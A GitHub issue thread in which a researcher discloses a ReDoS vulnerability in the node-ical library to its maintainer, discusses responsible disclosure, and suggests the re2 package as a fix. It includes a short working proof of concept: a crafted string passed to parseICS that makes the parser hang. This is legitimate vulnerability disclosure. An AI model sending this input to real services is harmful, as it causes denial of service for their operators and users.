Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ReDoS in node-ical #153

Open
yetingli opened this issue Sep 14, 2021 · 7 comments
Open

ReDoS in node-ical #153

yetingli opened this issue Sep 14, 2021 · 7 comments

Comments

@yetingli
Copy link

Hey Jens,

Recently I found a potential ReDoS vulnerability inside node-ical and provided some proper examples. You can access the vulnerability details at huntr. Please feel free to get in touch if there are any more issues.

Best regards,
Yeting

@jens-maus
Copy link
Owner

Please make this security report public on huntr rather than keeping it private.

@yetingli
Copy link
Author

Sorry, I don't have permission to make this security report public on huntr. Only after this report is confirmed can it be made public. You can use your GitHub account to log in and access.

@jens-maus
Copy link
Owner

What‘s wrong in posting this information here directly on GitHub?

@yetingli
Copy link
Author

yetingli commented Sep 14, 2021

Others suggested that I should do a responsible disclosure, that is, I should not open an issue until the report has been validated. Once the report is made public, but not repaired in time, it may pose a certain risk.

@jens-maus
Copy link
Owner

No problem here with that. node-ical is no missing critical application and I am not a security nerd either. Simply post it and I will see that I will try to review it ASAP.

@yetingli
Copy link
Author

Thank you for your understanding!
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability. It allows cause a denial of service when calling parseICS.

Proof of Concept

var nodeIcal = require("node-ical")
var str= "!!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!!";
nodeIcal.parseICS(str);

@yetingli
Copy link
Author

A relatively simple patch, you can use the package re2 (https://www.npmjs.com/package/re2). I hope this can help you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants